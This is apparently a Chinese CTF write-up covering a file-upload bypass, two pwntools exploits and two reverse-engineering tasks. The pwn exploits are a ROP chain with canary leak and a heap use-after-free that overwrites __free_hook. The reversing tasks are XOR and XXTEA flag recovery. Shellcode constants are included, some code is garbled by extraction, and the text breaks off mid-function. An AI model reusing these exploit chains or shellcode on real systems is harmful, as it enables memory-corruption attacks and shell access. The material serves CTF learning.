Web
HackMe
開局一個文件上傳,utf-16的編碼繞過,然後根據提示爆破文件名的最後四位 0000 - 9999,就可以訪問到了,注意是12小時。
Pwn
babyrop
DEBUG
# _*_ coding:utf-8 _*_
from pwn import *
import numpy as np
# Process setup for the babyrop script (Python 2 era: note the `.next()`
# iterator call further down).  `context`, `process` and `ELF` come from the
# pwn star-import above.
context.log_level='debug'
#context.terminal=['tmux', 'splitw', '-h']
prog='./babyrop'
#elf=ELF(prog)
# Local process under test; the LD_PRELOAD variant is left commented out.
p=process(prog)#,env={'LD_PRELOAD':'./libc-2.27.so'})
# Loaded only for symbol/string offsets (`libc.sym[...]`, `libc.search(...)` below).
libc=ELF('./libc-2.27.so')
#p=remote('123.57.207.81',44823)
def debug(addr,PIE=False):
    """Attach gdb to the global process `p` with one breakpoint per address in `addr`.

    With PIE=True each entry of `addr` is an offset and is rebased on the value
    parsed from the second line of `pmap <pid>` (index 1 of readlines());
    otherwise the entries are used verbatim.  Relies on `os`, `gdb` and `p`
    being in module scope (pwn star-import).

    NOTE(review): the `os.popen(...)` line below has lost its outer quoting in
    extraction (single quotes nested inside single quotes) and does not parse
    as printed.
    """
    debug_str=''
    if PIE:
        text_base=int(os.popen('pmap {}| awk '{{print $1}}''.format(p.pid)).readlines()[1], 16)
        for i in addr:
            # one "b *<addr>" gdb command per line
            debug_str+='b *{}\n'.format(hex(text_base+i))
        gdb.attach(p,debug_str)
    else:
        for i in addr:
            debug_str+='b *{}\n'.format(hex(i))
        gdb.attach(p,debug_str)
def dbg():
    """Attach gdb to the global process `p` without setting any breakpoints."""
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
# I/O shorthands over the global process `p`.
# NOTE(review): the bodies of the first eight lambdas (everything after the
# parameter list) were lost when this page was extracted, so `s`, `sa`, `sl`,
# `sla`, `r`, `ru`, `it` and `bp` are syntax errors as printed.  Only
# uu32/uu64/li survived intact.
s=lambda data

sa=lambda delim,data

sl=lambda data

sla=lambda delim,data

r=lambda numb=4096

ru=lambda delims, drop=True

it=lambda

# Right-pad a short byte string with NULs to 4/8 bytes, then unpack with
# pwntools' u32/u64 (little-endian by default).
uu32=lambda data :u32(data.ljust(4, '\0'))
uu64=lambda data :u64(data.ljust(8, '\0'))
bp=lambda bkp

# Log a label and a value rendered as hex via pwntools' success logger.
li=lambda str1,data1 :log.success(str1+'========'+hex(data1))
def dbgc(addr):
    """Attach gdb to `p`, set a breakpoint at `addr`, and continue immediately."""
    gdb.attach(p,'b*' + hex(addr) +'\n c')
def lg(s,addr):
    """Print label `s` right-aligned in 20 columns and `addr` as hex, in bold red."""
    fmt='\033[1;31;40m%20s--0x%x\033[0m'
    line=fmt%(s,addr)
    print(line)
# Shellcode string constants carried over from a generic exploit skeleton.
# None of the three is referenced anywhere in this script, so they are dead
# data here.
sh_x86_18='\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
sh_x86_20='\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
sh_x64_21='\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05'
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------sa('name? \n','a'*0x19)
# --- babyrop main flow ---------------------------------------------------------
# NOTE(review): this listing was scraped from a forum and is not runnable as
# printed: the separator comment above swallowed an `sa(...)` call (harmless,
# the same call is repeated below), and the canary line has lost an operator
# between `)` and `8`.
# Addresses below are hard-coded for the non-PIE challenge binary.
debug([0x400752])
main=0x40075b
val=0x400717
read_plt=0x400600
bss=0x601010
puts_got=0x600fc0
puts_plt=0x4005d0
printf_plt=0x4005f0
# NOTE(review): main, val, read_plt, puts_got and printf_plt are never used by
# name; several of the same values reappear as bare literals further down
# (0x40075b, 0x400717, 0x600fc0).
# Fill the name field with 0x19 bytes and read back the echo; the 7 bytes
# that follow (up to the ',') are taken as the canary.
sa('name? \n','a'*0x19)
ru('a'*0x19)
rdi=0x400913
canary=(uu64(ru(',')[0:7]))8
lg('canary',canary)
sla('his challenge\n',str(0x4009ae))
pay=(p64(0x601010+8)*3)
# Message payload layout appears to be [data][canary][saved rbp][return
# address]; rbp is pointed at bss+8 and control goes to 0x40075c.
sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x40075c))
sleep(0.5)
#pay=p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(val)+'\n'
#s(pay)
# Same write-then-return pattern repeated three times; each "name" answer is
# a small gadget chain and each "message" answer re-arms the canary/rbp/ret.
sa('name? \n',p64(rdi)+p64(puts_plt)+p64(0x40075b)+'\n')
sla('his challenge\n',str(0x4009ae))
pay=p64(puts_plt)+p64(0x400717)+'a'*8
sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x40075c))
# 0x600fc0 is puts_got (defined above but not used by name).
sa('name? \n',p64(rdi)+p64(0x600fc0)+p64(0x000000000040090c)+'\n')
sla('his challenge\n',str(0x4009ae))
pay=p64(puts_plt)+p64(0x400717)+'a'*8
sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x0000400911))
# Reads a 6-byte pointer ending in 0x7f and subtracts an offset copied from a
# single debugging session; the offset is specific to that libc build.
libc_base=uu64(ru('\x7f',drop=False)[-6:])-(0x7f23ededeaa0-0x7f23ede5e000)
lg('libc_base',libc_base)
# `.next()` is the Python 2 iterator protocol (Python 3 would need next(...)).
sa('name? \n',p64(rdi)+p64(libc.search('/bin/sh').next()+libc_base)+p64(libc_base+libc.sym['system'])+'\n')
sla('his challenge\n',str(0x4009ae))
pay=p64(puts_plt)+p64(0x400717)+'a'*8
sa('message\n',pay+p64(canary)+p64(bss+8)+p64(0x0000000000400911))
# Duplicate of the lg() call above; prints the same value again.
lg('libc_base',libc_base)
it()
bookshop
UAF fastbin+tcache
# _*_ coding:utf-8 _*_
from pwn import *
# Process setup for the bookshop script; `context`, `process` and `ELF` come
# from the pwn star-import above.
context.log_level='debug'
prog='./bookshop'
#elf=ELF(prog)
# Local process under test; the LD_PRELOAD variant is left commented out.
# NOTE(review): the commented env points at libc-2.27 while the ELF parsed
# below is libc-2.31 — only the latter is used for symbol offsets.
p=process(prog)#,env={'LD_PRELOAD':'./libc-2.27.so'})
libc=ELF('./libc-2.31.so')
#p=remote('123.57.132.168',30042)
def debug(addr,PIE=True):
    """Attach gdb to the global process `p` with one breakpoint per address in `addr`.

    PIE defaults to True here (the babyrop copy of this helper defaults to
    False): each entry is an offset rebased on the value parsed from the
    second line of `pmap <pid>`.  With PIE=False entries are used verbatim.
    Relies on `os`, `gdb` and `p` from module scope.

    NOTE(review): the `os.popen(...)` line below has lost its outer quoting in
    extraction and does not parse as printed.
    """
    debug_str=''
    if PIE:
        text_base=int(os.popen('pmap {}| awk '{{print $1}}''.format(p.pid)).readlines()[1], 16)
        for i in addr:
            # one "b *<addr>" gdb command per line
            debug_str+='b *{}\n'.format(hex(text_base+i))
        gdb.attach(p,debug_str)
    else:
        for i in addr:
            debug_str+='b *{}\n'.format(hex(i))
        gdb.attach(p,debug_str)
def dbg():
    """Attach gdb to the global process `p` without setting any breakpoints."""
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
# I/O shorthands over the global process `p` (same skeleton as the babyrop
# script above).
# NOTE(review): the bodies of `s`, `sa`, `sl`, `sla`, `r`, `ru`, `it` and `bp`
# were lost in extraction; as printed they are syntax errors.  The exploit
# below calls `sla`, `ru` and `it`, so none of it runs from this listing.
s=lambda data

sa=lambda delim,data

sl=lambda data

sla=lambda delim,data

r=lambda numb=4096

ru=lambda delims, drop=True

it=lambda

# Right-pad a short byte string with NULs to 4/8 bytes, then unpack with
# pwntools' u32/u64 (little-endian by default).
uu32=lambda data :u32(data.ljust(4, '\0'))
uu64=lambda data :u64(data.ljust(8, '\0'))
bp=lambda bkp

# Log a label and a value rendered as hex via pwntools' success logger.
li=lambda str1,data1 :log.success(str1+'========'+hex(data1))
def dbgc(addr):
    """Attach gdb to `p`, set a breakpoint at `addr`, and continue immediately."""
    gdb.attach(p,'b*' + hex(addr) +'\n c')
def lg(s,addr):
    """Print label `s` right-aligned in 20 columns and `addr` as hex, in bold red."""
    text='\033[1;31;40m%20s--0x%x\033[0m'%(s,addr)
    print(text)
# Shellcode string constants carried over from a generic exploit skeleton.
# None of `sh_x86_18`, `sh_x86_20` or `sh` is referenced by exp() below, so
# they are dead data in this script.
sh_x86_18='\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
sh_x86_20='\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
sh='\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x50\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x48\xc7\xc0\x3b\x00\x00\x00\x0f\x05'
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def choice(idx):
    """Answer the menu prompt (a bare ' ' delimiter) with option number `idx`."""
    selection=str(idx)
    sla(' ',selection)
def add(con):
    """Menu option 1: create a new entry whose content is `con`."""
    option,prompt=1,' '
    choice(option)
    sla(prompt,con)
def delete(idx):
    """Menu option 2: remove entry `idx` (answers the 'bag?' prompt)."""
    option,prompt=2,'bag?'
    choice(option)
    sla(prompt,str(idx))
def show(idx):
    """Menu option 3: print entry `idx` (answers the 'read?' prompt)."""
    option,prompt=3,'read?'
    choice(option)
    sla(prompt,str(idx))
def exp():
    """Drive the bookshop binary through the menu helpers above.

    The sequence (allocate, free, show, allocate again) is order-sensitive;
    the comments below describe what each step does as visible here, and
    hedge where the intent is inferred.  Depends on `sla`, `ru`, `it`,
    `uu64`, `lg`, `libc` and the menu helpers from module scope.
    """
    # Answers the initial 'number?' prompt with 0x68 (104); presumably the
    # per-entry allocation size.
    sla('number?',str(0x68))
    # Ten entries whose content is the repeated 16-byte pattern (0, 0x71),
    # then one with (0x421, 0x41) after four zero qwords; looks like fake
    # chunk-header layouts, but that is inferred from the values only.
    for i in range(10):
        add(6*(p64(0)+p64(0x71)))
    add(p64(0)*4+(p64(0x421)+p64(0x41)))
    # Free entries 0..6, then entry 8.
    for i in range(7):
        delete(i)
    delete(8)
    # Read entry 1 back: skip 'Content: ', take the last 6 bytes before the
    # newline as a heap pointer.
    show(1)
    ru('Content: ')
    heap=uu64(ru('\n')[-6:])
    lg('heap',heap)
    for i in range(7):
        add(6*(p64(0)+p64(0x71)))
    # Entry 8 is freed a second time here (it was already freed above) —
    # this is the UAF/double-free the section title refers to.
    delete(8)
    add(p64(heap+0x40))
    add(p64(0))
    add(p64(0)*3+p64(0x421))
    lg('heap',heap+0x40)
    #dbg()
    delete(1)
    show(1)
    # Reads a 6-byte pointer ending in 0x7f and subtracts an offset copied
    # from a single debugging session; the offset is specific to that libc build.
    libc_base=uu64(ru('\x7f',drop=False)[-6:])-(0x7f3f97308be0-0x7f3f9711d000)
    lg('libc',libc_base)
    fh=libc_base + libc.sym['__free_hook']
    sys=libc_base + libc.sym['system']
    # NOTE(review): `sys` shadows the stdlib module name (pwn star-imports it);
    # harmless here but easy to trip over.
    delete(2)
    delete(20)
    delete(0)
    # Entry contents: the free-hook address repeated, then '/bin/sh\x00',
    # then the system address; the final delete(22) is what triggers the
    # hook, after which the script drops to interactive.
    add(p64(fh)*12)
    add('/bin/sh\x00')
    add(p64(sys))
    delete(22)
    it()
# Script entry point: run exp() only when executed directly, not on import.
if __name__=='__main__':
    exp()
Re
Random
直接調試發現key不變
q=[0x3E,0xCD,0xAA,0x8E,0x96,0x1F,0x89,0xCD,0xDB,0xF1,
0x70,0xF2,0xA9,0x9C,0xC2,0x8B,0xF2,0xFE,0xAD,0x8B,
0x58,0x7C,0x2F,0x03,0x4A,0x65,0x31,0x89,0x76,0x57,
0x88,0xDF,0xB8,0xE9,0x01,0xE9,0xDE,0xE5,0x86,0x68,
0x8F,0x24,0xD3,0x5A]
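# Recover the flag by XOR-ing the captured ciphertext `q` (defined above; the
# author found by debugging that the key never changes) against the key `k`.
k=[0x58,0xa1,0xcb,0xe9,0xed,0x2c,0xec,0xfb,0xe9,0xc4,0x16,0x97,0x99,0xb1,0xa4,0xe9,0xc3,0xc6,0x80,0xbf,0x3e,0x44,0x18,0x2e,0x73,0x56,0x52,0xb8,0x5b,0x66,0xed,0xbc,0x8a,0xd8,0x36,0x8f,0xe6,0xd3,0xb1,0x51,0xb9,0x59,0xd3,0x5a]
# Element-wise XOR.  The pasted listing had `chr(q^k)` (list ^ list), which
# raises TypeError; the per-index subscripts appear to have been lost in
# extraction and are restored here.  `zip` pairs `q` and `k` position by
# position (both carry 44 values), which is the original per-index loop.
f=''.join(chr(a^b) for a,b in zip(q,k))
# `print(f)` with a single argument behaves the same under Python 2 and 3.
print(f)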
flag{3e625fe0-fb18-4f87-93c1-1ec217f86796}
wow
upx -d 脫殼後,patch 掉這一段:
; Stub the author patches out after unpacking.  Looks like a trick to break
; linear disassembly: call $+5 pushes 0x402357 (the next instruction) and
; falls through to it; the add then bumps that saved address by 6 (IDA's
; var_4 is conventionally -4, so [esp+4+var_4] is [esp]), giving 0x40235D,
; which is the byte right after the retf on the following line — so the
; retf resumes there rather than anywhere the disassembler shows here.
.text:00402352 call $+5
.text:00402357 add [esp+4+var_4], 6
.text:0040235B dec eax
.text:0040235C retf
int __cdecl main(int argc, const char **argv, const char **envp)
{
    /* NOTE(review): IDA-style decompiler output pasted from a forum.  The
     * extraction dropped every '<', '>' and '&' character (e.g. `i 8` in the
     * for-loop header and `(v11 + 1) 3` in the mixing terms), and the
     * messages appear as multi-character char literals ('wrong\n'), so this
     * does not compile as printed; read it as pseudocode.
     *
     * Visible flow: obtain a string v20, reject it unless it is exactly 36
     * characters, run a do/while block transform over it that adds
     * 0x67452301 to a running sum on every round (the constant the author
     * identifies as the XXTEA DELTA), then compare two buffers via
     * sub_4029F0 and print "right" or "wrong". */
    int *v3; //esi
    int *v4; //ebp
    int v5; //ecx
    int v6; //ebp
    int v7; //esi
    int v8; //ecx
    int v9; //edi
    unsigned int i; //ebx
    unsigned int v11; //ecx
    unsigned int v12; //edx
    unsigned int v13; //ecx
    int *v15; //[esp+10h] [ebp-68h]
    int v16; //[esp+2Ch] [ebp-4Ch]
    int v17; //[esp+30h] [ebp-48h]
    int v18; //[esp+34h] [ebp-44h]
    char v19[24]; //[esp+38h] [ebp-40h] BYREF
    char v20[24]; //[esp+50h] [ebp-28h] BYREF
    int v21; //[esp+74h] [ebp-4h]
    int savedregs; //[esp+78h] [ebp+0h] BYREF
    v4=savedregs;
    sub_4024C0(v20);                     /* opaque helper; presumably initialises v20 */
    v21=0;
    sub_402740(dword_42AFD0, v20);       /* opaque helper; presumably fills v20 from input */
    scanf(v19, input);
    LOBYTE(v21)=1;
    if ( strlen(v20) !=36 )              /* exact length check: 36 characters */
    {
        printf((int)unk_42AE80, 'wrong\n');
        v17=0;
        v16=0;
LABEL_9:
        /* Shared teardown path; also reached from the "right" branch below. */
        *((_BYTE *)v4 - 4)=0;
        sub_402430(v4 - 16);
        *(v4 - 1)=-1;
        sub_402430(v4 - 10);
        return *(v4 - 19);
    }
    v18=sub_402420(v20);                 /* presumably the data pointer of v20 */
    v15=v3;
    v5=*(_DWORD *)(v18 + 34);
    v6=12;                                /* round counter; see the while() note below */
    v7=0;                                 /* running sum */
    do
    {
        v7 +=0x67452301;                  /* sum += DELTA once per outer round */
        v8=v5 - 1;
        v9=v7 + 4;
        for ( i=0; i 8; ++i )              /* 8 inner iterations (comparison operator lost) */
        {
            v11=v8 + 2;
            /* Mixing term with the shape of XXTEA's MX: shift-by-3 and
             * shift-by-5 residues next to *16 (<<4) and *4 (<<2) — the shift
             * operators themselves are missing from the paste. */
            v12=(((v11 + 1) 3) + (v7 ^ (16 * (v11 + 1)))) ^ (((((v11 + 1) 3) + (v7 ^ (16 * (v11 + 1)))) ^ ((v11 + 1) 3))
                + ((v11 5) ^ (4 * v11)));
            *(_DWORD *)v12 +=v12;
            v6 +=2;
            v9 +=4;
            v8=*(_DWORD *)v12 + 1;
        }
        v13=*(_DWORD *)v12 + 3;
        /* Final-word update of the round, same MX-shaped term. */
        *(_DWORD *)(v7 + 32) +=(((v13 + 1) 3) + (v7 ^ (16 * (v13 + 1)))) ^ (((((v13 + 1) 3) + (v7 ^ (16 * (v13 + 1)))) ^ ((v13 + 1) 3))
            + ((v13 5) ^ (4 * v13)));
        v5=*(_DWORD *)(v7 + 32);
        v6 +=2;
    }
    while ( v6 );                         /* NOTE(review): with v6 only ever growing from 12 this
                                             cannot reach 0; the sign/operator is probably garbled */
    v4=v15;
    if ( sub_4029F0(v15 - 10, v15 - 16) ) /* buffer comparison; nonzero means match */
    {
        printf((int)unk_42AE80, 'right\n');
        *(v15 - 19)=0;
        goto LABEL_9;
    }
    printf((int)unk_42AE80, 'wrong\n');
    /* Same teardown as LABEL_9, duplicated by the decompiler. */
    *((_BYTE *)v15 - 4)=0;
    sub_402430(v15 - 16);
    *(v15 - 1)=-1;
    return sub_402430(v15 - 10);
}
看出差不多是xxtea加密
看彙編,找到key=[0xEFCDAB89,0x10325476,0x98BADCFE,0xC3D2E1F0]
DELTA = 0x67452301
密文
0xD8F758F5,0x526849DB,0xE2D72563,0x485EEFAC,0x608F4BC6,0x5859F76A,0xB03565A3,0x3E4091C1,0xD3DB5B9A
網上找個腳本解密
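/* Header of the reference XXTEA (Wheeler & Needham) decryption snippet the
 * author pulled from the web.  The pasted copy had lost its '<', '>' and '&'
 * characters (angle brackets on the includes, shifts and mask in MX, and the
 * space in the DELTA define); they are restored here to the reference form. */
#include <stdio.h>
#include <stdint.h>

/* Round constant.  The challenge binary uses 0x67452301 in place of the
 * standard XXTEA delta 0x9E3779B9 (see the decompiled loop above). */
#define DELTA 0x67452301

/* XXTEA mixing term.  As in the reference code it reads y, z, sum, p and e
 * and the four-word array `key` from the enclosing function's scope. */
#define MX (((z>>5^y<<2) + (y>>3^z<<4)) ^ ((sum^y) + (key[(p&3)^e] ^ z)))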
void xxtea(uint32_t* v, int n, uint32_t* key)
{
uint32_t y, z, sum;
unsigned p, rounds, e;
if (n &g